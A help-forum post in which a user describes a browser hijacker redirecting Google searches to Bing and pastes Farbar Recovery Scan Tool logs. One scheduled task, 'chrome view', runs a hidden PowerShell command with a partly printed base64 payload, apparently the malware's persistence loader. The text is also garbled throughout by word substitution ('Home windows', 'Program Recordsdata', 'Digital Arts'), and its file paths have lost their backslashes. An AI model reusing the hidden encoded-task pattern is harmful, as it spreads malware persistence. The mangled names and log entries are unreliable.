[Windows10, Malware] Search engine will get hijacked and redirected

Amora R Jelo

Hi there, I am in a little bit of a pickle that I’ve no clue how I discovered myself in, and will use assist! My browsers (first Chrome and after making an attempt to change, Firefox) preserve having my google searches redirected to Bing. I noticed in one other thread, right here: https://www.bleepingcomputer.com/boards/t/774366/windows-malwareadware-browsers-crash-and-become-erratic-when-charging/ somebody mentioning the identical factor occurring to them. Though my circumstances main as much as the malware are completely different, I’m positively experiencing what this man is as effectively. I first observed it about 2 weeks in the past once I turned off my digital soundboard that I’ve used for over a 12 months, Voicemeeter Banana and switched my most important supply of audio from the soundboard to my monitor with the intention to watch Netflix with out a headset. Quickly after, once I received on Chrome, my default browser on the time, I observed a cmd immediate window would open and instantly shut with out me having the ability to work together with it. From there, each time I attempted to make use of Google, it could get redirected to Bing. I am considerably tech savvy, so I instantly checked my packages and downloads to see if something modified, however I could not discover something out of the abnormal. I then checked my extensions, and that is once I observed a really nondescript “Viewer” extension downloaded itself. I promptly wiped my Chrome’s information, deleted it, then reinstalled it and the issue went away. I used to be flawed. A number of days in the past, I as soon as once more tried to vary my major sound gadget to my monitor and the issue got here again. I ran quite a few adware/antivirus software program in addition to the in-built Home windows Defender to no avail as nothing posing as a risk would get caught, however clearly there’s one. The extension additionally reappeared, however was extra aggressive. I could not open my extensions tab nor work together with it, as any time I did, it could simply redirect me to the settings tab and never extensions, however I used to be in a position to delete it by right-clicking it and eradicating it that means, and as quickly as I did the issue would go away. I attempted including Malwarebytes Browser Guard to assist cowl the tracks, however it could as soon as once more flash a cmd window then the browser would reset and the extension would come again.

 

After utterly wiping Chrome from my pc (and probably foolishly messing with the registry) I switched to Firefox, and it was going nice until final night time when the issue began to occur right here. The one distinction is it does not present an add-on being enabled and wiping my browser information, cache, and bookmarks (I imported them from Chrome, however deleted them after contemplating that might have been the trigger) and once more, resetting the app, deleting it and re-downloading does not repair it both. I used to be in a position to see it’s positively being attributable to a URL referred to as goog.muendakere.xyz that momentarily pops up earlier than going to Bing, so I used to be in a position to block it with an add-on in the interim that appears to have stopped the difficulty, however not solved it because it’s absolutely nonetheless lively and making an attempt to interrupt by way of as I get notifications once I open the browser, it is being blocked.

 

I’ve ran quite a few scanners, Malwarebytes, rkill, HitmanPro, adwcleaner, and tdsskiller (rkill, Hitman, and adwcleaner being really useful by Reddit’s IT subreddit), however only some say they choose up something and take away them, but it surely’s nonetheless not getting no matter this very annoyingly elusive virus is. I’ve tried offline mode and scanning, backing as much as a earlier save level (this labored the primary time and I assumed that may be the top of it, and now I can not return to earlier than that backup date because it’s not an possibility to revive to), and ensuring my packages/drivers are up to date. I can solely hope somebody right here may also help me with this in addition to I am at my wit’s finish! I am wanting wiping my Home windows and beginning over, however I’ve quite a lot of saved information on my PC and I am nervous if I again up my recordsdata, no matter is inflicting that is nonetheless there and I might reset my PC for nothing. I tremendously thank upfront to anybody who can reply and assist me with this, I might be ceaselessly grateful and appreciateive of the assistance.

 

Beneath is my FRST.txt/Addition.txt logs:

 

Scan results of Farbar Restoration Scan Instrument (FRST) (x64) Model: 09-07-2022
Ran by Xolo (administrator) on DESKTOP-RQB4PO2 (Gigabyte Expertise Co., Ltd. Z390 GAMING X) (10-07-2022 01:15:35)
Working from C:UsersXoloDownloads
Loaded Profiles: Xolo
Platform: Microsoft Home windows 10 Dwelling Model 21H2 19044.1806 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Regular

==================== Processes (Whitelisted) =================

(If an entry is included within the fixlist, the method can be closed. The file is not going to be moved.)

(Blizzard Leisure, Inc. -> Blizzard Leisure) C:ProgramDataBattle.netAgentAgent.7893Agent.exe
(C:Program Recordsdata (x86)CoolerMasterPORTALCMService.exe ->) (Cooler Grasp Expertise Inc. -> ) C:Program Recordsdata (x86)CoolerMasterPORTALcm-blackhawk.exe
(C:Program Recordsdata (x86)OriginOrigin.exe ->) (Digital Arts, Inc. -> ) C:Program Recordsdata (x86)OriginQtWebEngineProcess.exe <3>
(C:Program Recordsdata (x86)OverwolfOverwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:Program Recordsdata (x86)Widespread FilesOverwolf.199.0.15OverwolfHelper.exe
(C:Program Recordsdata (x86)OverwolfOverwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:Program Recordsdata (x86)Widespread FilesOverwolf.199.0.15OverwolfHelper64.exe
(C:Program Recordsdata (x86)OverwolfOverwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:Program Recordsdata (x86)Overwolf.199.0.15OverwolfBrowser.exe <3>
(C:Program Recordsdata (x86)Steamsteam.exe ->) (Valve Corp. -> Valve Company) C:Program Recordsdata (x86)Steambincefcef.win7x64steamwebhelper.exe <7>
(C:Program FilesLGHUBlghub.exe ->) (Logitech Inc -> Logitech, Inc.) C:Program FilesLGHUBlghub_agent.exe
(C:Program FilesLGHUBlghub_agent.exe ->) (Logitech Inc -> Logitech, Inc.) C:Program FilesLGHUBlogi_crashpad_handler.exe <2>
(C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:Program FilesMalwarebytesAnti-Malwarembamtray.exe
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Microsoft Home windows -> Microsoft Company) C:WindowsSystem32rundll32.exe
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Nvidia Company -> NVIDIA Company) C:Program FilesNVIDIA CorporationNVIDIA GeForce ExperienceNVIDIA Share.exe <3>
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Nvidia Company -> NVIDIA Company) C:Program FilesNVIDIA CorporationShadowPlaynvsphelper64.exe
(C:Program FilesTabletWacomWacomHost.exe ->) (Wacom Co., Ltd. -> Wacom Co. Ltd.) C:Program FilesTabletWacomWacom_Tablet.exe
(C:Program FilesTabletWacomWTabletServicePro.exe ->) (Wacom Co., Ltd. -> Wacom Co. Ltd.) C:Program FilesTabletWacomWacom_TabletUser.exe
(C:Program FilesTabletWacomWTabletServicePro.exe ->) (Wacom Co., Ltd. -> Wacom Co. Ltd.) C:Program FilesTabletWacomWacom_TouchUser.exe
(C:Program FilesTabletWacomWTabletServicePro.exe ->) (Wacom Expertise Corp. -> Wacom Expertise) C:Program FilesTabletWacomWacomHost.exe
(cmd.exe ->) (Microsoft Home windows -> Microsoft Company) C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
(D:EpicGamesEpic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe ->) (Epic Video games Inc. -> Epic Video games, Inc.) D:EpicGamesEpic GamesLauncherEngineBinariesWin64EpicWebHelper.exe <2>
(explorer.exe ->) (Apple Inc.) C:Program FilesWindowsAppsAppleInc.iTunes_12124.1.57017.0_x64__nzyj5cx40ttqaAMDS64AppleMobileDeviceProcess.exe
(explorer.exe ->) (Blizzard Leisure, Inc. -> Blizzard Leisure) C:Program Recordsdata (x86)Battle.netBattle.internet.exe <3>
(explorer.exe ->) (Digital Arts, Inc. -> Digital Arts) C:Program Recordsdata (x86)OriginOrigin.exe
(explorer.exe ->) (Epic Video games Inc. -> Epic Video games, Inc.) D:EpicGamesEpic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe
(explorer.exe ->) (File-New-Venture) C:Program FilesWindowsApps40459File-New-Venture.EarTrumpet_2.2.0.0_x86__1sdd7yawvg6neEarTrumpetEarTrumpet.exe
(explorer.exe ->) (HP Inc. -> Hewlett-Packard Improvement Firm, LP) C:Program FilesHPHP Officejet 4630 seriesBinScanToPCActivationApp.exe
(explorer.exe ->) (Logitech Inc -> Logitech, Inc.) C:Program FilesLGHUBlghub.exe <4>
(explorer.exe ->) (Microsoft Company -> Microsoft Company) C:Program Recordsdata (x86)MicrosoftEdgeApplicationmsedge.exe <7>
(explorer.exe ->) (Riot Video games, Inc. -> Riot Video games, Inc.) C:Program FilesRiot Vanguardvgtray.exe
(explorer.exe ->) (Telegram FZ-LLC -> Telegram FZ-LLC) C:UsersXoloAppDataRoamingTelegram DesktopTelegram.exe
(explorer.exe ->) (Valve Corp. -> Valve Company) C:Program Recordsdata (x86)Steamsteam.exe
(explorer.exe ->) (Vincent Burel -> VB-AUDIO Software program) C:Program Recordsdata (x86)VBVoicemeetervoicemeeterpro.exe
(GIGA-BYTE TECHNOLOGY CO., LTD. -> ) C:Program Recordsdata (x86)GIGABYTEAppCenterApCent.exe
(GitHub, Inc.) [File not signed] C:Program Recordsdata (x86)Wonderful CoreGlorious Core.exe <3>
(Hewlett-Packard Firm -> Hewlett-Packard) C:Program Recordsdata (x86)HPHP Software program Updatehpwuschd2.exe
(Mozilla Company -> Mozilla Company) C:Program FilesMozilla Firefoxfirefox.exe <18>
(Nvidia Company -> Node.js) C:Program Recordsdata (x86)NVIDIA CorporationNvNodeNVIDIA Net Helper.exe
(Overwolf Ltd -> Overwolf LTD) C:Program Recordsdata (x86)OverwolfOverwolf.exe
(providers.exe ->) () [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALCMService.exe
(providers.exe ->) () [File not signed] C:Program Recordsdata (x86)GIGABYTEAppCenterAdjustService.exe
(providers.exe ->) (Digital Arts, Inc. -> Digital Arts) C:Program Recordsdata (x86)OriginOriginWebHelperService.exe
(providers.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) C:Program Recordsdata (x86)GIGABYTEEasyTuneEngineServiceEasyTuneEngineService.exe
(providers.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft) C:Program Recordsdata (x86)GIGABYTEGServiceGCloud.exe
(providers.exe ->) (HP Inc. -> HP Inc.) C:Program FilesHPPrintScanDoctorHPPrintScanDoctorService.exe
(providers.exe ->) (Intel Company -> Intel Company) C:WindowsSystem32DriverStoreFileRepositorymewmiprov.inf_amd64_cad1db73e8c782a6WMIRegistrationService.exe
(providers.exe ->) (Intel® Embedded Subsystems and IP Blocks Group -> Intel Company) C:Program Recordsdata (x86)IntelIntel® Administration Engine ComponentsLMSLMS.exe
(providers.exe ->) (Intel® Embedded Subsystems and IP Blocks Group -> Intel Company) C:WindowsSystem32DriverStoreFileRepositorydal.inf_amd64_b5484efd38adbe8djhi_service.exe
(providers.exe ->) (Intuit, Inc. -> Intuit Inc.) C:Program Recordsdata (x86)Widespread FilesIntuitUpdate Service v4IntuitUpdateService.exe
(providers.exe ->) (Logitech Inc -> Logitech) C:Program FilesLogitechLogiCapturebinServiceLogiFacecamService.exe
(providers.exe ->) (Logitech Inc -> Logitech, Inc.) C:Program FilesLGHUBlghub_updater.exe
(providers.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe
(providers.exe ->) (Microsoft Company) C:Program FilesWindowsAppsMicrosoft.GamingServices_4.66.22002.0_x64__8wekyb3d8bbwegamingservices.exe
(providers.exe ->) (Microsoft Company) C:Program FilesWindowsAppsMicrosoft.GamingServices_4.66.22002.0_x64__8wekyb3d8bbwegamingservicesnet.exe
(providers.exe ->) (ND_Apps -> Intel Company) C:WindowsSystem32IPROSetMonitor.exe
(providers.exe ->) (Nvidia Company -> NVIDIA Company) C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe <3>
(providers.exe ->) (Nvidia Company -> NVIDIA Company) C:WindowsSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_c43eff7079c4c90cDisplay.NvContainerNVDisplay.Container.exe <2>
(providers.exe ->) (SurfRight B.V. -> SurfRight B.V.) C:Program FilesHitmanProhmpsched.exe
(providers.exe ->) (Valve Corp. -> Valve Company) C:Program Recordsdata (x86)Widespread FilesSteamSteamService.exe
(providers.exe ->) (Wacom Co., Ltd. -> Wacom Co. Ltd.) C:Program FilesTabletWacomWTabletServicePro.exe
(svchost.exe ->) (HP Inc. -> Hewlett-Packard Improvement Firm, LP) C:Program FilesHPHP Officejet 4630 seriesBinHPNetworkCommunicatorCom.exe
(svchost.exe ->) (Microsoft Company) C:Program FilesWindowsAppsMicrosoft.549981C3F5F10_4.2204.13303.0_x64__8wekyb3d8bbweCortana.exe
(svchost.exe ->) (Microsoft Home windows -> Microsoft Company) C:WindowsSystem32cmd.exe
(svchost.exe ->) (Microsoft Home windows -> Microsoft Company) C:WindowsSystem32dllhost.exe
(svchost.exe ->) (Microsoft Home windows -> Microsoft Company) C:WindowsSystem32smartscreen.exe

==================== Registry (Whitelisted) ===================

(If an entry is included within the fixlist, the registry merchandise can be restored to default or eliminated. The file is not going to be moved.)

HKLM…Run: [RtkAudUService] => “C:WINDOWSSystem32RtkAudUService64.exe” -background (No File)
HKLM…Run: [Riot Vanguard] => C:Program FilesRiot Vanguardvgtray.exe [3183328 2022-03-11] (Riot Video games, Inc. -> Riot Video games, Inc.)
HKLM-x32…Run: [HP Software Update] => C:Program Recordsdata (x86)HpHP Software program UpdateHPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard Firm -> Hewlett-Packard)
HKLM-x32…Run: [] => [X]
HKLM-x32…Run: [Glorious Core] => C:Program Recordsdata (x86)Wonderful CoreGlorious Core.exe [93642752 2022-05-25] (GitHub, Inc.) [File not signed]
HKLM-x32…RunOnce: [PreRun] => C:Program Recordsdata (x86)GigabyteAppCenterPreRun.exe [14632 2016-02-26] (GIGA-BYTE TECHNOLOGY CO., LTD. -> )
HKLM-x32…RunOnce: [DualBiosRescue] => C:Program Recordsdata (x86)GIGABYTEGigabyteFirmwareUpdateUtilitydbrro.exe [12096 2015-08-19] (GIGA-BYTE TECHNOLOGY CO., LTD. -> )
HKLMSOFTWAREMicrosoftWindows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLMSOFTWAREMicrosoftWindows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [LGHUB] => C:Program FilesLGHUBlghub.exe [146943096 2022-06-08] (Logitech Inc -> Logitech, Inc.)
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [Steam] => C:Program Recordsdata (x86)Steamsteam.exe [4282328 2022-06-06] (Valve Corp. -> Valve Company)
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [Battle.net] => C:Program Recordsdata (x86)Battle.netBattle.internet.exe [1089912 2022-06-29] (Blizzard Leisure, Inc. -> Blizzard Leisure)
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [EpicGamesLauncher] => D:EpicGamesEpic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe [32661456 2022-07-07] (Epic Video games Inc. -> Epic Video games, Inc.)
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [Overwolf] => C:Program Recordsdata (x86)OverwolfOverwolfLauncher.exe [1802072 2022-06-01] (Overwolf Ltd -> Overwolf Ltd.)
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [EADM] => C:Program Recordsdata (x86)OriginOrigin.exe [3148016 2022-05-27] (Digital Arts, Inc. -> Digital Arts)
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [HP Officejet 4630 series (NET)] => C:Program FilesHPHP Officejet 4630 seriesBinScanToPCActivationApp.exe [3486368 2021-11-30] (HP Inc. -> Hewlett-Packard Improvement Firm, LP)
HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Run: [MicrosoftEdgeAutoLaunch_0275CE6492128BC6A1B7D2331172BB93] => “C:Program Recordsdata (x86)MicrosoftEdgeApplicationmsedge.exe” –no-startup-window –win-session-start /prefetch:5 [3601824 2022-07-05] (Microsoft Company -> Microsoft Company)
HKLM…PrintMonitorsHP C611 Standing Monitor: C:Windowssystem32hpinkstsC611LM.dll [333344 2013-05-06] (Hewlett Packard -> Hewlett-Packard Co.)
HKLM…PrintMonitorsHP Discovery Port Monitor (HP Officejet 4630 sequence): C:Windowssystem32HPDiscoPMC611.dll [763040 2021-11-30] (HP Inc. -> Hewlett-Packard Improvement Firm, LP)
Startup: C:UsersXoloAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupVoicemeeter (VB-Audio).LNK [2021-06-27]
ShortcutTarget: Voicemeeter (VB-Audio).LNK -> C:Program Recordsdata (x86)VBVoicemeetervoicemeeterpro.exe (Vincent Burel -> VB-AUDIO Software program)

==================== Scheduled Duties (Whitelisted) ============

(If an entry is included within the fixlist, it is going to be faraway from the registry. The file is not going to be moved until listed individually.)

Job: {02EF7135-0870-4B00-A6D5-B057ADCBC05B} – System32TasksSIV => C:Program Recordsdata (x86)GIGABYTESIVThermald.exe [389504 2021-06-29] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Job: {160C639D-B911-4F6F-BA76-4BE9F68C46FE} – System32TasksEasyTune 1 => C:Program Recordsdata (x86)GIGABYTEEasyTuneetocfile.exe [20352 2021-10-11] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Job: {384AECFE-CADD-4065-80DE-D6D3EC666441} – System32TasksNvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program Recordsdata (x86)NVIDIA CorporationNvNodenvnodejslauncher.exe [646344 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {3FF23881-EDB5-4E3C-A5FD-942E07132863} – System32TasksOverwolf Updater Job => C:Program Recordsdata (x86)Widespread FilesOverwolfOverwolfUpdater.exe [2577240 2022-06-01] (Overwolf Ltd -> Overwolf LTD)
Job: {48B6474C-231C-4401-B2F1-897238674EC7} – System32TasksEasyTune => C:Program Recordsdata (x86)GIGABYTEEasyTuneetinit.exe [17280 2021-04-08] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Job: {4C38EF77-4453-42FF-BDF4-FF9DAD704554} – System32TasksGraphicsCardEngine => C:Program Recordsdata (x86)GIGABYTEEasyTuneEngineServiceGraphicsCardEngineStarter.exe [234880 2021-04-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Job: {5F0D1C88-2618-4710-B4D9-8EFDEF1D19A3} – System32TasksNvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {642C1D3C-FEB5-48F9-920E-9FE542F14BE2} – System32TasksNvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationUpdate CoreNvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {69F27A08-9535-42E5-A4A1-5A56EFB3DB2B} – System32TasksHPHP Print Scan DoctorPrinter Well being Monitor Logon => C:Program FilesHPPrintScanDoctorHPPrinterHealthMonitor.exe [42144 2022-04-30] (HP Inc. -> HP Inc.)
Job: {6E117F88-1DB0-4FCE-88AF-0AFEED27E021} – System32Taskschrome view => cmd /c powershell -WindowStyle Hidden -E “CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAkAGoAcAA9ACQAbgB1AGwAbAA7AAoACgAkAGEAcwBjAEUAbgBjAFQAeAB0AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoACgBmAHUAbgBjAHQAaQBvAG4AIABnAGUAdABJAHQAZQBtACgAWwBzAHQAcgBpAG4AZwBdAC (the information entry has 4995 extra characters). <==== ATTENTION
Job: {7040E469-3465-4604-A06C-F6BEE9BC6514} – System32TasksNvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationUpdate CoreNvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {7586EF2B-8E22-4CC1-B62B-E396EA6C222F} – System32TasksMozillaFirefox Background Replace 308046B0AF4A39CB => C:Program FilesMozilla Firefoxfirefox.exe –MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 –MOZ_LOG_FILE C:ProgramDataMozilla-1de4eec8-1241-4177-a864-e594e8d1fb38updates308046B0AF4A39CBbackgroundupdate.moz_log –backgroundtask backgroundupdate
Job: {760455A8-13BE-43E4-AA7C-7288967547F0} – System32TasksNvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {8C5A5F7A-036A-49C6-A8FA-10090E5A0515} – System32TasksNvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {90C4E1BD-50B7-4E8C-B759-0AAB18854359} – System32TasksNorton Safety Scan for Xolo => C:Program Recordsdata (x86)Norton Safety ScanEngine4.6.1.179Nss.exe [848912 2019-02-15] (Symantec Company -> Symantec Company)
Job: {A589382C-5BAD-4AC5-8EFF-78BF320826C4} – System32TasksNvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe [1003128 2022-03-01] (Nvidia Company -> NVIDIA Company) -> -d “C:Program FilesNVIDIA CorporationNvDriverUpdateCheck” -l 3 -f C:ProgramDataNVIDIANvContainerDriverUpdateCheck.log
Job: {AB53C559-86BF-4DFD-9313-FD4E3E15C788} – System32TasksHPHP Print Scan DoctorPrinter Well being Monitor => C:Program FilesHPPrintScanDoctorHPPrinterHealthMonitor.exe [42144 2022-04-30] (HP Inc. -> HP Inc.)
Job: {ADB34A3B-80C9-45F5-8A36-57330BDE19BD} – System32TasksSIV-VGA => C:Program Recordsdata (x86)GIGABYTESIVSensord.exe [257408 2021-06-29] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Job: {BFE1E028-2D85-419E-B42E-F527292E1349} – System32TasksHPCustParticipation HP Officejet 4630 sequence => C:Program FilesHPHP Officejet 4630 seriesBinHPCustPartic.exe [5744800 2021-11-30] (HP Inc. -> Hewlett-Packard Improvement Firm, LP)
Job: {C0187BBA-5351-4948-B5CE-DBED16ABA20B} – System32TasksNVIDIA GeForce Expertise SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNVIDIA GeForce ExperienceNVIDIA GeForce Expertise.exe [3342080 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {C54FD96C-C339-4568-BB42-726FD6F78920} – System32TasksIntel PTT EK Recertification => C:WINDOWSSystem32DriverStoreFileRepositoryiclsclient.inf_amd64_76523213b78d9046libIntelPTTEKRecertification.exe [818008 2021-09-15] (Intel Company -> Intel® Company)
Job: {D63AD333-8F6B-42D3-91C8-D7B0CFAF8564} – System32TasksMozillaFirefox Default Browser Agent 308046B0AF4A39CB => C:Program FilesMozilla Firefoxdefault-browser-agent.exe do-task “308046B0AF4A39CB”
Job: {DB7AA2C5-9C10-4555-BAE3-867E6A462884} – System32TasksNvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Company -> NVIDIA Company)
Job: {FA78A4B1-B9F7-4F26-A112-CB2F0140C60F} – System32TasksMSIAfterburner => C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe [804408 2021-12-03] (MICRO-STAR INTERNATIONAL CO., LTD. -> )

(If an entry is included within the fixlist, the duty (.job) file can be moved. The file which is operating by the duty is not going to be moved.)

Job: C:WINDOWSTasksCreateExplorerShellUnelevatedTask.job => C:WINDOWSexplorer.exe
Job: C:WINDOWSTasksIntel PTT EK Recertification.job => C:WINDOWSSystem32DriverStoreFileRepositoryiclsclient.inf_amd64_76523213b78d9046libIntelPTTEKRecertification.exe

==================== Web (Whitelisted) ====================

(If an merchandise is included within the fixlist, if it’s a registry merchandise it is going to be eliminated or restored to default.)

TcpipParameters: [DhcpNameServer] 10.214.1.1
Tcpip..Interfaces{9ea7cc7f-0bb2-4458-bf6b-a5bd4d0ce5bd}: [NameServer] 1.1.1.1,8.8.8.8
Tcpip..Interfaces{9ea7cc7f-0bb2-4458-bf6b-a5bd4d0ce5bd}: [DhcpNameServer] 10.214.1.1

Edge:
=======
Edge Extension: (No Identify) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:WindowsSystemAppsMicrosoft.MicrosoftEdge_8wekyb3d8bbweAssetsHostExtensionsAutoFormFill [not found]
Edge Extension: (No Identify) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:WindowsSystemAppsMicrosoft.MicrosoftEdge_8wekyb3d8bbweAssetsBookViewer [not found]
Edge Extension: (No Identify) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:WindowsSystemAppsMicrosoft.MicrosoftEdge_8wekyb3d8bbweAssetsHostExtensionsLearningTools [not found]
Edge Extension: (No Identify) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:WindowsSystemAppsMicrosoft.MicrosoftEdge_8wekyb3d8bbweAssetsHostExtensionsPinJSAPI [not found]
Edge Profile: C:UsersXoloAppDataLocalMicrosoftEdgeUser DataDefault [2022-07-10]

FireFox:
========
FF DefaultProfile: 7ab1jtg9.default
FF ProfilePath: C:UsersXoloAppDataRoamingMozillaFirefoxProfiles7ab1jtg9.default [2021-07-31]
FF ProfilePath: C:UsersXoloAppDataRoamingMozillaFirefoxProfilesnso3jclo.default-release-1657427381712 [2022-07-10]
FF Extension: (uBlock Origin) – C:UsersXoloAppDataRoamingMozillaFirefox[email protected]raymondhill.internet.xpi [2022-07-10]
FF Extension: (Block Website) – C:UsersXoloAppDataRoamingMozillaFirefoxProfilesnso3jclo.default-release-1657427381712Extensions{07046613-1993-4b66-9dd1-9dd1ce581cb7}.xpi [2022-07-09]
FF Extension: (Malwarebytes Browser Guard) – C:UsersXoloAppDataRoamingMozillaFirefoxProfilesnso3jclo.default-release-1657427381712Extensions{242af0bb-db11-4734-b7a0-61cb8a9b20fb}.xpi [2022-07-09]
FF Plugin: @java.com/DTPlugin,model=11.241.2 -> C:Program FilesJavajre1.8.0_241bindtpluginnpDeployJava1.dll [2020-03-30] (Oracle America, Inc. -> Oracle Company)
FF Plugin: @java.com/JavaPlugin,model=11.241.2 -> C:Program FilesJavajre1.8.0_241binplugin2npjp2.dll [2020-03-30] (Oracle America, Inc. -> Oracle Company)

==================== Providers (Whitelisted) ===================

(If an entry is included within the fixlist, it is going to be faraway from the registry. The file is not going to be moved until listed individually.)

S3 AppleChargerSrv; C:WINDOWSSystem32AppleChargerSrv.exe [31272 2010-04-06] (Giga-Byte Expertise -> )
R2 CMService; C:Program Recordsdata (x86)CoolerMasterPORTALCMService.exe [117248 2020-02-24] () [File not signed]
S3 EasyAntiCheat; C:Program Recordsdata (x86)EasyAntiCheatEasyAntiCheat.exe [1134624 2022-06-07] (EasyAntiCheat Oy -> Epic Video games, Inc)
S3 EasyAntiCheat_EOS; C:Program Recordsdata (x86)EasyAntiCheat_EOSEasyAntiCheat_EOS.exe [584680 2022-03-02] (EasyAntiCheat Oy -> Epic Video games, Inc.)
R2 EasyTuneEngineService; C:Program Recordsdata (x86)GigabyteEasyTuneEngineServiceEasyTuneEngineService.exe [147840 2022-01-25] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
S3 EpicOnlineServices; C:Program Recordsdata (x86)Epic GamesEpic On-line ServicesserviceEpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Video games Inc. -> Epic Video games, Inc.)
S3 EQU8_19; C:ProgramDataEQU8Totally Correct Battlegroundsbinanticheat.x64.equ8.exe [5673048 2021-04-11] (Int3 Software program AB -> Int3 Software program AB)
S3 EQU8_39; C:ProgramDataEQU8KovaaK’sbinanticheat.x64.equ8.exe [6396560 2021-12-01] (Int3 Software program AB -> Int3 Software program AB)
S2 GameInput Service; C:Program Recordsdata (x86)Microsoft GameInputx64gameinputsvc.exe [75240 2022-05-25] (Microsoft Company -> Microsoft Company)
R2 Gservice; C:Program Recordsdata (x86)GIGABYTEGServiceGCloud.exe [19888 2016-12-02] (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft)
R2 HitmanProScheduler; C:Program FilesHitmanProhmpsched.exe [152576 2022-07-09] (SurfRight B.V. -> SurfRight B.V.)
R2 HPPrintScanDoctorService; C:Program FilesHPPrintScanDoctorHPPrintScanDoctorService.exe [223904 2022-04-30] (HP Inc. -> HP Inc.)
R2 LGHUBUpdaterService; C:Program FilesLGHUBlghub_updater.exe [11523704 2022-06-08] (Logitech Inc -> Logitech, Inc.)
R2 LogiFacecamService; C:Program FilesLogitechLogiCapturebinServiceLogiFacecamService.exe [497568 2021-04-08] (Logitech Inc -> Logitech)
R2 MBAMService; C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe [8677120 2022-07-06] (Malwarebytes Inc. -> Malwarebytes)
R2 MyService1; C:Program Recordsdata (x86)GigabyteAppCenterAdjustService.exe [18944 2021-04-08] () [File not signed]
S2 OCButtonService; C:Program Recordsdata (x86)GigabyteEasyTuneEngineServiceOcButtonService.exe [127360 2021-04-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
